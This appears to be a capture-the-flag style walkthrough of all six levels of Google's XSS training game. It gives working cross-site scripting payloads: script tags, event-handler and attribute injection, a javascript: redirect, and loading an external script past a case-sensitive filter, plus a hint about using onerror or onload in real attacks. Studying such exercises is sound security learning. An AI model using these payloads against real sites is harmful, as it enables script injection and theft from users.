Google XSS solutions

1. # lvl 1
2.  
3. Enter `<script>alert('')</script>` into the search box.
4.  
5. # lvl 2
6.  
7. Use the `onclick` attribute of the font tag (hint is from the first post, which shows `<font>` might be allowed for the purpose of changing colors. Winning message:
8.  
9. <font color="red" onclick="alert('')">blah</font>
10.  
11. and then click blah after posting the message. (or use onload etc.)
12.  
13. # lvl 3
14.  
15. Modify the URL parameter so that you inject code into the `<img>` tag:
16.  
17. https://xss-game.appspot.com/level3/frame#1.jpg' onclick="alert('')" alt='a picture called 1
18.  
19. which will render as:
20.  
21. html += "<img src='/static/level3/cloud/1.jpg' onclick="alert('')" alt='a picture called 1.jpg'/>";
22.  
23. on line 17 of the HTML file. Now click on the picture.
24.  
25. # lvl 4
26.  
27. Use `3'); alert('` as the value for your timer.
28.  
29. # lvl 5
30.  
31. Notice that if you type `javascript:alert('')` into your browser location bar, an alert will pop up. So we'll use this as the location that the user is sent to on the signup page. Go the the URL:
32.  
33. https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('')
34.  
35. and then click the `Next` link.
36.  
37. # lvl 6
38.  
39. The regex only notices lowercase https. So upload this JS file to some URL http://mysite.com/xss.js:
40.  
41. alert('');
42.  
43. and then go the the url `https://xss-game.appspot.com/level6/frame#Http://mysite.com/xss.js`
44.  
45. # Notes
46.  
47. In an actual attack you'd use onerror or onload everywhere instead of onclick.